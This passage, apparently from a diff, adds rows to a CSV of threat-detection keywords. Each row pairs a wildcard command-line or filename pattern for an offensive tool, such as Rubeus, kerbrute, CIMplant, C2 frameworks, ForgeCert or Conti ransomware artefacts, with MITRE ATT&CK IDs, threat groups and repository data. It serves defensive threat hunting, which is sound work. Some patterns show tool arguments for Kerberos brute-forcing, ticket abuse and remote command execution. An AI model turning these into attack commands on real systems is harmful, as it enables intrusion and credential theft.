Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A" +"* broadcast-wsdd-discover.nse*","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A" +"* broadcast-xdmcp-discover.nse*","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A" +"* bropper.py*","offensive_tool_keyword","bropper","An automatic Blind ROP exploitation tool ","T1068 - T1059.003 - T1140","TA0002 - TA0005 - TA0040","N/A","N/A","Exploitation Tools","https://github.com/Hakumarachi/Bropper","1","0","N/A","7","2","175","18","2023-06-09T12:40:05Z","2023-01-20T14:09:19Z" +"* brute * /password*","offensive_tool_keyword","Rubeus","Rubeus is a C# toolset for raw Kerberos interaction and abuses. It is heavily adapted from Benjamin Delpys Kekeo project (CC BY-NC-SA 4.0 license) and Vincent LE TOUXs MakeMeEnterpriseAdmin project (GPL v3.0 license). 
Full credit goes to Benjamin and Vincent for working out the hard components of weaponization- without their prior work this project would not exist.","T1558 - T1559 - T1078 - T1550","TA0002 - TA0003 - TA0007","N/A","N/A","Credential Access","https://github.com/GhostPack/Rubeus","1","0","N/A","N/A","10","3454","711","2023-09-25T09:48:31Z","2018-09-23T23:59:03Z"
+"* BruteForce(*","offensive_tool_keyword","ruler","A tool to abuse Exchange services","T1102.001 - T1201.001 - T1570.002","TA0006","N/A","N/A","Exploitation tools","https://github.com/sensepost/ruler","1","0","N/A","N/A","10","1994","353","2021-02-19T09:28:07Z","2016-08-18T15:05:13Z"
+"* --brute-ratel*","offensive_tool_keyword","bofhound","Generate BloodHound compatible JSON from logs written by ldapsearch BOF - pyldapsearch and Brute Ratel's LDAP Sentinel","T1046 - T1087 - T1003","TA0007 - TA0009 - TA0001","N/A","N/A","Discovery","https://github.com/fortalice/bofhound","1","0","N/A","5","3","252","25","2023-09-21T23:23:07Z","2022-05-10T17:41:53Z"
+"* Brutesploit*","offensive_tool_keyword","BruteSploit","BruteSploit is a collection of method for automated Generate. Bruteforce and Manipulation wordlist with interactive shell. 
That can be used during a penetration test to enumerate and maybe can be used in CTF for manipulation.combine.transform and permutation some words or file text","T1110","N/A","N/A","N/A","Exploitation tools","https://github.com/screetsec/BruteSploit","1","0","N/A","N/A","7","666","261","2020-04-05T00:29:26Z","2017-05-31T17:00:51Z"
+"* bruteuser *","offensive_tool_keyword","kerbrute","A tool to perform Kerberos pre-auth bruteforcing","T1110","TA0006","N/A","N/A","Credential Access","https://github.com/ropnop/kerbrute","1","0","N/A","N/A","10","2145","368","2023-08-10T00:25:23Z","2019-02-03T18:21:17Z"
+"* build Dent.go*","offensive_tool_keyword","cobaltstrike","A framework for creating COM-based bypasses utilizing vulnerabilities in Microsoft's WDAPT sensors.","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/optiv/Dent","1","0","N/A","10","10","296","51","2023-08-18T17:28:54Z","2021-05-03T14:00:29Z"
+"* -Build -NoAttackPaths*","offensive_tool_keyword","badazure","BadZure orchestrates the setup of Azure Active Directory tenants 
populating them with diverse entities while also introducing common security misconfigurations to create vulnerable tenants with multiple attack paths","T1583 - T1078.004 - T1095","TA0005 - TA0006 - TA0008","N/A","N/A","Exploitation Tools","https://github.com/mvelazc0/BadZure/","1","0","N/A","5","4","302","18","2023-07-27T15:40:41Z","2023-05-05T04:52:21Z"
+"* build_letmeout*","offensive_tool_keyword","cobaltstrike","Project to enumerate proxy configurations and generate shellcode from CobaltStrike","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/EncodeGroup/AggressiveProxy","1","0","N/A","10","10","139","26","2020-11-04T16:08:11Z","2020-11-04T12:53:00Z"
+"* BypassFramework.py*","offensive_tool_keyword","FourEye","AV Evasion Tool","T1059 - T1059.001 - T1059.005 - T1027 - T1027.005","TA0002 - TA0005","N/A","N/A","Defense Evasion","https://github.com/lengjibo/FourEye","1","0","N/A","10","8","724","154","2021-12-08T11:55:15Z","2020-12-11T01:29:58Z"
+"* BypassUac*.bat*","offensive_tool_keyword","cobaltstrike","Ladon is a 
large-scale intranet penetration tool. which can be modularized by PowerShell. plugged in CS. loaded in memory and has no file scanning","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/k8gege/Ladon","1","0","N/A","10","10","4238","827","2023-09-11T14:47:26Z","2019-11-02T06:22:41Z"
+"* BypassUac*.dll*","offensive_tool_keyword","cobaltstrike","Ladon is a large-scale intranet penetration tool. which can be modularized by PowerShell. plugged in CS. 
loaded in memory and has no file scanning","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/k8gege/Ladon","1","0","N/A","10","10","4238","827","2023-09-11T14:47:26Z","2019-11-02T06:22:41Z"
+"* BypassUac*.exe*","offensive_tool_keyword","cobaltstrike","Ladon is a large-scale intranet penetration tool. which can be modularized by PowerShell. plugged in CS. 
loaded in memory and has no file scanning","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/k8gege/Ladon","1","0","N/A","10","10","4238","827","2023-09-11T14:47:26Z","2019-11-02T06:22:41Z"
+"* -c * --choose-mutators * -s 1*","offensive_tool_keyword","Bashfuscator","A fully configurable and extendable Bash obfuscation framework","T1027 - T1027.004 - T1059 - T1059.004","TA0005 - TA0002","N/A","N/A","Defense Evasion","https://github.com/Bashfuscator/Bashfuscator","1","0","N/A","10","10","1348","159","2023-09-05T10:40:25Z","2018-08-03T21:25:22Z"
+"* -c * -o payload.ser*","offensive_tool_keyword","pysoserial","Python-based proof-of-concept tool for generating payloads that utilize unsafe Java object deserialization.","T1556 - T1556.001 - T1556.002 - T1556.003 - T1557 - T1558 - T1573 - T1574","TA0003 - TA0004 - TA0005 - TA0006 - TA0008","N/A","N/A","shell spawning","https://github.com/aStrowxyu/Pysoserial","1","0","N/A","9","1","9","1","2021-12-06T07:41:55Z","2021-11-16T01:55:31Z"
+"* -c 
*ExploitClass.cs*System.dll*","offensive_tool_keyword","ysoserial.net","Deserialization payload generator for a variety of .NET formatters","T1059.007 - T1027.002 - T1059.001","TA0005 - TA0040","N/A","N/A","Exploitation Tools","https://github.com/pwntester/ysoserial.net","1","0","N/A","10","10","2726","442","2023-06-27T12:08:11Z","2017-09-18T17:48:08Z"
+"* -c *OBFUSCATION=*.ps1*","offensive_tool_keyword","GreatSCT","The project is called Great SCT (Great Scott). Great SCT is an open source project to generate application white list bypasses. This tool is intended for BOTH red and blue team.","T1055 - T1112 - T1189 - T1205","TA0005 - TA0006 - TA0008","N/A","N/A","Defense Evasion","https://github.com/GreatSCT/GreatSCT","1","0","N/A","N/A","10","1103","214","2021-02-10T22:05:27Z","2017-05-12T03:30:41Z"
+"* -c '/accepteula /s calc.exe' -e PsExec64.exe*","offensive_tool_keyword","pywsus","The main goal of this tool is to be a standalone implementation of a legitimate WSUS server which sends malicious responses to clients. 
The MITM attack itself should be done using other dedicated tools such as Bettercap.","T1505.003 - T1001.001 - T1560.001 - T1071.001","TA0003 - TA0011 - TA0002","N/A","N/A","Network Exploitation tools","https://github.com/GoSecure/pywsus","1","0","N/A","N/A","3","248","38","2022-11-11T19:59:21Z","2020-08-11T21:44:35Z"
+"* -c active_users -u *","offensive_tool_keyword","CIMplant","C# port of WMImplant which uses either CIM or WMI to query remote systems","T1047 - T1059.001 - T1021.006","TA0002 - TA0007 - TA0008","N/A","N/A","Lateral Movement - Sniffing & Spoofing","https://github.com/RedSiege/CIMplant","1","0","N/A","10","2","189","30","2021-07-14T18:18:42Z","2021-01-29T21:41:58Z"
+"* -c all -d * --domaincontroller *","offensive_tool_keyword","sharphound","C# Data Collector for BloodHound","T1057 - T1059 - T1053","TA0003 - TA0008 - TA0009","N/A","N/A","Reconnaissance","https://github.com/BloodHoundAD/SharpHound","1","0","N/A","N/A","5","440","125","2023-10-04T21:38:29Z","2021-07-12T17:07:04Z"
+"* -c command_exec --execute tasklist*","offensive_tool_keyword","CIMplant","C# port of WMImplant which uses either CIM or WMI to query remote systems","T1047 - T1059.001 - T1021.006","TA0002 - TA0007 - TA0008","N/A","N/A","Lateral Movement - Sniffing & Spoofing","https://github.com/RedSiege/CIMplant","1","0","N/A","10","2","189","30","2021-07-14T18:18:42Z","2021-01-29T21:41:58Z"
+"* -c command_exec --execute whoami*","offensive_tool_keyword","CIMplant","C# port of WMImplant which uses either CIM or WMI to query remote systems","T1047 - T1059.001 - T1021.006","TA0002 - TA0007 - TA0008","N/A","N/A","Lateral Movement - Sniffing & Spoofing","https://github.com/RedSiege/CIMplant","1","0","N/A","10","2","189","30","2021-07-14T18:18:42Z","2021-01-29T21:41:58Z"
+"* -c CredEnum.c*","offensive_tool_keyword","cobaltstrike","Cobalt Strike Beacon Object Files","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - 
T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/guervild/BOFs","1","0","N/A","10","10","154","27","2022-05-02T16:59:24Z","2021-03-15T23:30:22Z"
+"* -c edr_query *","offensive_tool_keyword","CIMplant","C# port of WMImplant which uses either CIM or WMI to query remote systems","T1047 - T1059.001 - T1021.006","TA0002 - TA0007 - TA0008","N/A","N/A","Lateral Movement - Sniffing & Spoofing","https://github.com/RedSiege/CIMplant","1","0","N/A","10","2","189","30","2021-07-14T18:18:42Z","2021-01-29T21:41:58Z"
+"* -c logon_events * -u *","offensive_tool_keyword","CIMplant","C# port of WMImplant which uses either CIM or WMI to query remote systems","T1047 - T1059.001 - T1021.006","TA0002 - TA0007 - TA0008","N/A","N/A","Lateral Movement - Sniffing & Spoofing","https://github.com/RedSiege/CIMplant","1","0","N/A","10","2","189","30","2021-07-14T18:18:42Z","2021-01-29T21:41:58Z"
+"* -c ls --directory * -u * -p *","offensive_tool_keyword","CIMplant","C# port of WMImplant which uses either CIM or WMI to query remote systems","T1047 - T1059.001 - T1021.006","TA0002 - TA0007 - TA0008","N/A","N/A","Lateral Movement - Sniffing & 
Spoofing","https://github.com/RedSiege/CIMplant","1","0","N/A","10","2","189","30","2021-07-14T18:18:42Z","2021-01-29T21:41:58Z"
+"* -c process_kill --process *","offensive_tool_keyword","CIMplant","C# port of WMImplant which uses either CIM or WMI to query remote systems","T1047 - T1059.001 - T1021.006","TA0002 - TA0007 - TA0008","N/A","N/A","Lateral Movement - Sniffing & Spoofing","https://github.com/RedSiege/CIMplant","1","0","N/A","10","2","189","30","2021-07-14T18:18:42Z","2021-01-29T21:41:58Z"
+"* -c service_mod --execute create -s *","offensive_tool_keyword","CIMplant","C# port of WMImplant which uses either CIM or WMI to query remote systems","T1047 - T1059.001 - T1021.006","TA0002 - TA0007 - TA0008","N/A","N/A","Lateral Movement - Sniffing & Spoofing","https://github.com/RedSiege/CIMplant","1","0","N/A","10","2","189","30","2021-07-14T18:18:42Z","2021-01-29T21:41:58Z"
+"* -c upload --fileto * --file *","offensive_tool_keyword","CIMplant","C# port of WMImplant which uses either CIM or WMI to query remote systems","T1047 - T1059.001 - T1021.006","TA0002 - TA0007 - TA0008","N/A","N/A","Lateral Movement - Sniffing & Spoofing","https://github.com/RedSiege/CIMplant","1","0","N/A","10","2","189","30","2021-07-14T18:18:42Z","2021-01-29T21:41:58Z"
+"* -c vacant_system * -u *","offensive_tool_keyword","CIMplant","C# port of WMImplant which uses either CIM or WMI to query remote systems","T1047 - T1059.001 - T1021.006","TA0002 - TA0007 - TA0008","N/A","N/A","Lateral Movement - Sniffing & Spoofing","https://github.com/RedSiege/CIMplant","1","0","N/A","10","2","189","30","2021-07-14T18:18:42Z","2021-01-29T21:41:58Z"
+"* -c -w *.txt -w *.txt --ss *","offensive_tool_keyword","wfuzz","Web application fuzzer.","T1210.001 - T1190 - T1595","TA0007 - TA0002 - TA0010","N/A","N/A","Information Gathering","https://github.com/xmendez/wfuzz","1","0","N/A","9","10","5263","1326","2023-04-29T01:41:47Z","2014-10-22T21:23:49Z"
+"* -c -w methods.txt -p 
127.0.0.1*","offensive_tool_keyword","wfuzz","Web application fuzzer.","T1210.001 - T1190 - T1595","TA0007 - TA0002 - TA0010","N/A","N/A","Information Gathering","https://github.com/xmendez/wfuzz","1","0","N/A","9","10","5263","1326","2023-04-29T01:41:47Z","2014-10-22T21:23:49Z"
+"* -c -w users.txt --hs *","offensive_tool_keyword","wfuzz","Web application fuzzer.","T1210.001 - T1190 - T1595","TA0007 - TA0002 - TA0010","N/A","N/A","Information Gathering","https://github.com/xmendez/wfuzz","1","0","N/A","9","10","5263","1326","2023-04-29T01:41:47Z","2014-10-22T21:23:49Z"
+"* -c -z file*users.txt -z file*pass.txt *","offensive_tool_keyword","wfuzz","Web application fuzzer.","T1210.001 - T1190 - T1595","TA0007 - TA0002 - TA0010","N/A","N/A","Information Gathering","https://github.com/xmendez/wfuzz","1","0","N/A","9","10","5263","1326","2023-04-29T01:41:47Z","2014-10-22T21:23:49Z"
+"* -c -z range*1-10 --hc=BBB http*","offensive_tool_keyword","wfuzz","Web application fuzzer.","T1210.001 - T1190 - T1595","TA0007 - TA0002 - TA0010","N/A","N/A","Information Gathering","https://github.com/xmendez/wfuzz","1","0","N/A","9","10","5263","1326","2023-04-29T01:41:47Z","2014-10-22T21:23:49Z"
+"* C:\ProgramData\sh.txt*","offensive_tool_keyword","conti","Conti is a Ransomware-as-a-Service (RaaS) that was first observed in December 2019. Conti has been deployed via TrickBot and used against major corporations and government agencies particularly those in North America. 
As with other ransomware families - actors using Conti steal sensitive files and information from compromised networks and threaten to publish this data unless the ransom is paid","T1059.003 - T1486 - T1140 - T1083 - T1490 - T1106 - T1135 - T1027 - T1057 - T1055.001 - T1021.002 - T1018 - T1489 - T1016 - T1049 - T1080","TA0002 - TA0003 - TA0004 - TA0007 - TA0009 - TA0040","Conti Ransomware","Wizard Spider","Ransomware","https://www.securonix.com/blog/on-conti-ransomware-tradecraft-detection/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A"
+"* C:\temp\w.log*","offensive_tool_keyword","SharpEfsPotato","Local privilege escalation from SeImpersonatePrivilege using EfsRpc.","T1548.002 - T1134.002","TA0004 - TA0006","N/A","N/A","Privilege Escalation","https://github.com/bugch3ck/SharpEfsPotato","1","0","N/A","10","3","241","40","2022-10-17T12:35:06Z","2022-10-17T12:20:47Z"
+"* C:\Users\Public\build.bat*","offensive_tool_keyword","Slackor","A Golang implant that uses Slack as a command and control server","T1059.003 - T1071.004 - T1562.001","TA0002 - TA0010 - TA0011","N/A","N/A","C2","https://github.com/Coalfire-Research/Slackor","1","0","N/A","10","10","451","108","2023-02-25T03:35:15Z","2019-06-18T16:01:37Z"
+"* C:\Users\Public\build.vbs*","offensive_tool_keyword","Slackor","A Golang implant that uses Slack as a command and control server","T1059.003 - T1071.004 - T1562.001","TA0002 - TA0010 - TA0011","N/A","N/A","C2","https://github.com/Coalfire-Research/Slackor","1","0","N/A","10","10","451","108","2023-02-25T03:35:15Z","2019-06-18T16:01:37Z"
+"* C:\Users\Public\DtcInstall.txt*","offensive_tool_keyword","Slackor","A Golang implant that uses Slack as a command and control server","T1059.003 - T1071.004 - T1562.001","TA0002 - TA0010 - TA0011","N/A","N/A","C2","https://github.com/Coalfire-Research/Slackor","1","0","N/A","10","10","451","108","2023-02-25T03:35:15Z","2019-06-18T16:01:37Z"
+"* c2 add *","offensive_tool_keyword","mythic","A collaborative multi-platform red 
teaming framework","T1573-001 - T1573-002 - T1573-003 - T1573-004 - T1573-005 - T1059-001 - T1059-003 - T1059-004 - T1003 - T1055 - T1036 - T1105 - T1218 - T1057 - T1574-001 - T1569-002","TA0002 - TA0003","N/A","N/A","C2","https://github.com/its-a-feature/Mythic","1","0","N/A","10","10","2492","383","2023-10-04T15:37:48Z","2018-07-05T02:09:59Z"
+"* c2 start http *","offensive_tool_keyword","mythic","A collaborative multi-platform red teaming framework","T1573-001 - T1573-002 - T1573-003 - T1573-004 - T1573-005 - T1059-001 - T1059-003 - T1059-004 - T1003 - T1055 - T1036 - T1105 - T1218 - T1057 - T1574-001 - T1569-002","TA0002 - TA0003","N/A","N/A","C2","https://github.com/its-a-feature/Mythic","1","0","N/A","10","10","2492","383","2023-10-04T15:37:48Z","2018-07-05T02:09:59Z"
+"* -c2server *","offensive_tool_keyword","poshc2","keywords from poshc2 usage - a proxy aware C2 framework used to aid red teamers with post-exploitation and lateral movement.","T1548.002 - T1134.002 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560.001 - T1119 - T1110 - T1555 - T1482 - T1546.003 - T1068 - T1210 - T1083 - T1056.001 - T1046 - T1040 - T1003.001 - T1201 - T1069.001 - T1055 - T1090 - T1082 - T1016 - T1049 - T1007 - T1569.002 - T1552.001 - T1550.002 - T1047","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011","N/A","APT33 - HEXANE","C2","https://github.com/nettitude/PoshC2","1","0","N/A","10","10","1602","312","2023-09-08T05:42:06Z","2018-07-23T08:53:32Z"
+"* --CaCertPath *.pfx --CaCertPassword *","offensive_tool_keyword","ForgeCert","ForgeCert uses the BouncyCastle C# API and a stolen Certificate Authority (CA) certificate + private key to forge certificates for arbitrary users capable of authentication to Active Directory.","T1553.002 - T1136.003 - T1059.001","TA0006 - TA0002","N/A","N/A","Defense Evasion","https://github.com/GhostPack/ForgeCert","1","0","N/A","10","6","538","87","2022-10-07T18:18:09Z","2021-06-09T22:04:18Z"
+"* 
CallDirect.py*","offensive_tool_keyword","POC","Vulnerability checker for Callstranger (CVE-2020-12695). An attacker can use this vulnerability for Bypassing DLP for exfiltrating data. Using millions of Internet-facing UPnP device as source of amplified reflected TCP DDoS / SYN Flood? Scanning internal ports from Internet facing UPnP devices This script only simulates data exfiltration","T1046 - T1595 - T1587","TA0001 - TA0002 - TA0009","N/A","N/A","Exploitation tools","https://github.com/yunuscadirci/CallStranger","1","0","N/A","N/A","4","391","70","2021-08-07T16:48:55Z","2020-06-08T07:37:49Z"
+"* CallStranger.py*","offensive_tool_keyword","POC","Vulnerability checker for Callstranger (CVE-2020-12695). An attacker can use this vulnerability for Bypassing DLP for exfiltrating data. Using millions of Internet-facing UPnP device as source of amplified reflected TCP DDoS / SYN Flood? Scanning internal ports from Internet facing UPnP devices This script only simulates data exfiltration","T1046 - T1595 - T1587","TA0001 - TA0002 - TA0009","N/A","N/A","Exploitation tools","https://github.com/yunuscadirci/CallStranger","1","0","N/A","N/A","4","391","70","2021-08-07T16:48:55Z","2020-06-08T07:37:49Z"
+"* -caplet *.cap","offensive_tool_keyword","bettercap","The Swiss Army knife for 802.11 - BLE - IPv4 and IPv6 networks reconnaissance and MITM attacks.","T1046 - T1190 - T1059 - T1053 - T1001.002 - T1110.001 - T1113 - T1132 - T1048","TA0010 - TA0001 - TA0002 - TA0003 - TA0005 - TA0006 - TA0009 - TA0011 - TA0010","N/A","N/A","Network Exploitation tools","https://github.com/bettercap/bettercap","1","0","N/A","N/A","10","14627","1373","2023-09-18T15:43:34Z","2018-01-07T15:30:41Z"
+"* cassandra-brute.nse*","offensive_tool_keyword","nmap","Nmap NSE Scripts. 
Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A"
+"* cassandra-info.nse*","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A"
+"* cccam-version.nse*","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A"
+"* certipy-ad*","offensive_tool_keyword","Certipy","Tool for Active Directory Certificate Services enumeration and abuse","T1555 T1588 T1552","N/A","N/A","N/A","Exploitation tools","https://github.com/ly4k/Certipy","1","0","N/A","10","10","1766","244","2023-09-26T00:51:47Z","2021-10-06T23:02:40Z"
+"* changepw * /ticket:*","offensive_tool_keyword","Rubeus","Rubeus is a C# toolset for raw Kerberos interaction and abuses. It is heavily adapted from Benjamin Delpys Kekeo project (CC BY-NC-SA 4.0 license) and Vincent LE TOUXs MakeMeEnterpriseAdmin project (GPL v3.0 license). 
Full credit goes to Benjamin and Vincent for working out the hard components of weaponization- without their prior work this project would not exist.","T1558 - T1559 - T1078 - T1550","TA0002 - TA0003 - TA0007","N/A","N/A","Credential Access","https://github.com/GhostPack/Rubeus","1","0","N/A","N/A","10","3454","711","2023-09-25T09:48:31Z","2018-09-23T23:59:03Z"
+"* charlotte.cpp*","offensive_tool_keyword","charlotte","c++ fully undetected shellcode launcher","T1055.012 - T1059.003 - T1027.002","TA0005 - TA0040","N/A","N/A","Defense Evasion","https://github.com/9emin1/charlotte","1","0","N/A","10","10","931","235","2021-06-11T04:44:18Z","2021-05-13T07:32:03Z"
+"* charlotte.dll *","offensive_tool_keyword","charlotte","c++ fully undetected shellcode launcher","T1055.012 - T1059.003 - T1027.002","TA0005 - TA0040","N/A","N/A","Defense Evasion","https://github.com/9emin1/charlotte","1","0","N/A","10","10","931","235","2021-06-11T04:44:18Z","2021-05-13T07:32:03Z"
+"* CharSubroutine-Macro.xls*","offensive_tool_keyword","Macrome","An Excel Macro Document Reader/Writer for Red Teamers & Analysts. Blog posts describing what this tool actually does can be found https://malware.pizza/2020/05/12/evading-av-with-excel-macros-and-biff8-xls/ and https://malware.pizza/2020/06/19/further-evasion-in-the-forgotten-corners-of-ms-xls/","T1140","TA0005","N/A","N/A","Exploitation tools","https://github.com/michaelweber/Macrome","1","0","N/A","N/A","6","522","83","2022-02-01T16:26:13Z","2020-05-07T22:44:11Z"
